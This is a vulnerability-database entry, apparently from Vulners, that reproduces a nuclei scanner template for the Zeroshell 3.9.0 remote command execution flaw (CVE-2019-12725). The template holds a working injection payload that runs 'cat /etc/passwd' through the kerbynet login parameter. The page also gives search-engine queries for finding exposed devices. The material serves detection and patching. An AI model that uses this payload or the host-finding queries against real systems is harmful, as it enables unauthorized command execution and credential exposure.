Zeroshell 3.9.0 - Remote Command Execution

05 Jul 2026 03:01:21 | Reported by ProjectDiscovery | Type: nuclei | github.com

Zeroshell 3.9.0 - Remote Command Execution vulnerability. Exploits mishandled HTTP parameters to execute arbitrary commands.

Related

| Reporter | Title | Published | Family |
| --- | --- | --- | --- |
| 0day.today | ZeroShell 3.9.0 - (cgi-bin/kerbynet) Remote Root Command Injection Exploit | 24 Nov 2020 00:00 | zdt |
| 0day.today | ZeroShell 3.9.0 - Remote Command Execution Exploit | 13 May 2021 00:00 | zdt |
| GithubExploit | Exploit for OS Command Injection in Zeroshell | 13 Jun 2021 23:57 | githubexploit |
| GithubExploit | Exploit for OS Command Injection in Zeroshell | 22 May 2021 05:06 | githubexploit |
| GithubExploit | Exploit for OS Command Injection in Zeroshell | 27 Apr 2021 03:36 | githubexploit |
| ATTACKERKB | CVE-2019-12725 | 19 Jul 2019 00:00 | attackerkb |
| Circl | CVE-2019-12725 | 19 Jul 2020 19:18 | circl |
| CNVD | Zeroshell Remote Command Execution Vulnerability | 23 Jul 2019 00:00 | cnvd |
| Check Point Advisories | Zeroshell Remote Code Execution (CVE-2019-12725) | 9 Sep 2020 00:00 | checkpoint_advisories |
| CVE | CVE-2019-12725 | 19 Jul 2019 22:17 | cve |

id: CVE-2019-12725

info:
  name: Zeroshell 3.9.0 - Remote Command Execution
  author: dwisiswant0,akincibor
  severity: critical
  description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
  reference:
    - https://www.zeroshell.org/new-release-and-critical-vulnerability/
    - https://www.tarlogic.com/advisories/zeroshell-rce-root.txt
    - https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py
    - https://zeroshell.org/blog/
    - http://packetstormsecurity.com/files/160211/ZeroShell-3.9.0-Remote-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-12725
    cwe-id: CWE-78
    epss-score: 0.89849
    epss-percentile: 0.99777
    cpe: cpe:2.3:o:zeroshell:zeroshell:3.9.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zeroshell
    product: zeroshell
    shodan-query: http.title:"zeroshell"
    fofa-query: title="zeroshell"
    google-query: intitle:"zeroshell"
  tags: cve,cve2019,packetstorm,rce,zeroshell,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210098be7c1bfa28074cda9e31747fc3559e3faae1d855dc156de7c8619475cb3ed6022100ffe58bf03daa81fb31ebe69fe15f8d712b162b78ff892ecccdaf8da0b755621e:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00 (Current)
Vulners AI Score: 7.4 (High risk)
CVSS 3: 9.8
CVSS 2: 10
EPSS: 0.89849